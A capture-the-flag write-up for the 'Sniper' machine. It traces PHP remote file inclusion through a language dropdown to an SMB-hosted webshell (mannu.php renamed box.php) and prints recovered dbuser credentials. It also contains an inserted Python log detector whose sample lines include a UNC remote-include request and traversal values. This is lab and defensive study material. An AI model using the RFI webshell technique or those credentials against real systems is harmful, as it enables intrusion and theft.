🔫Sniper
First we start with an nmap scan:
I first browse to the web page and find a nice interface with subcategories:
I then click on the user interface, which seemed to be the only legitimate page on the homepage:
I decided to create a user Felix/Felix:
and when trying to log in:
So I start to wonder if the other pages weren't fake rabbit holes:
On the "our service" page, we find a language dropdown menu linked to a PHP file, which could lead to RFI (Remote File Inclusion).
If we try to fetch a file in a subdirectory:
We can now try to gain a foothold via an SMB share.
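Seen from the defending side, the inclusion attempts described above (a file in a subdirectory, then an SMB share) leave a clear trace in the web server's access log. The detector below is an added example, not part of the original write-up; the parameter name `lang`, the `/page.php` path, the allowed file-name pattern and the log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

PARAM = "lang"  # assumption: name of the include parameter behind the dropdown
SAFE_VALUE = re.compile(r"^[A-Za-z0-9_-]+\.php$")  # assumption: bare file names only
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # request field of a log line

def classify(value):
    """Return why a decoded parameter value is suspicious, or None if it looks normal."""
    norm = value.replace("/", "\\")  # Windows PHP accepts both separators
    if re.match(r"^[A-Za-z][A-Za-z0-9+.-]*://", value):
        return "url-scheme"        # http://, ftp://, php:// style wrappers
    if norm.startswith("\\\\"):
        return "unc-path"          # \\host\share\file: remote include over SMB
    if "..\\" in norm or norm.endswith(".."):
        return "traversal"
    if norm.startswith("\\") or re.match(r"^[A-Za-z]:", norm):
        return "absolute-path"
    if not SAFE_VALUE.match(value):
        return "unexpected-value"  # e.g. a file in a subdirectory
    return None

def scan(lines):
    """Return (line number, reason, decoded value) for every suspicious request."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qs percent-decodes, so %5C%5C is seen as a leading \\
        for value in parse_qs(query, keep_blank_values=True).get(PARAM, []):
            reason = classify(value)
            if reason:
                findings.append((n, reason, value))
    return findings

# Constructed sample log lines (documentation-range IP addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /page.php?lang=blog-en.php HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Jan/2024:10:02:11 +0000] "GET /page.php?lang=subdir%5Cfile.php HTTP/1.1" 200 612',
    '192.0.2.77 - - [01/Jan/2024:10:03:40 +0000] "GET /page.php?lang=%5C%5C198.51.100.9%5Cshare%5Cbox.php HTTP/1.1" 200 301',
    '192.0.2.77 - - [01/Jan/2024:10:04:02 +0000] "GET /page.php?lang=..%2Fsubdir%2Ffile.php HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for lineno, reason, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: {reason}: {value}")
```

The same allow-list idea applies in the application itself: mapping the dropdown choice to a fixed set of file names server-side removes the need to detect bad values after the fact.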
Create a Webshell with Remote File Inclusion
Configure the proper permissions.
I configured the smb.conf file in the location /etc/samba/smb.conf.
Restart the Samba service to make the changes effective.
The last part is preparing a payload that can be called by the web server. I downloaded the script mannu.php and placed it in box.php in the location /var/www/html/.
And if I request the following URL with the RFI:
In the ../user/db.php file, if we click the edit button, we can see some very interesting stuff:
So we got some credentials for dbuser (36mEAhz/B8xQ~2VM).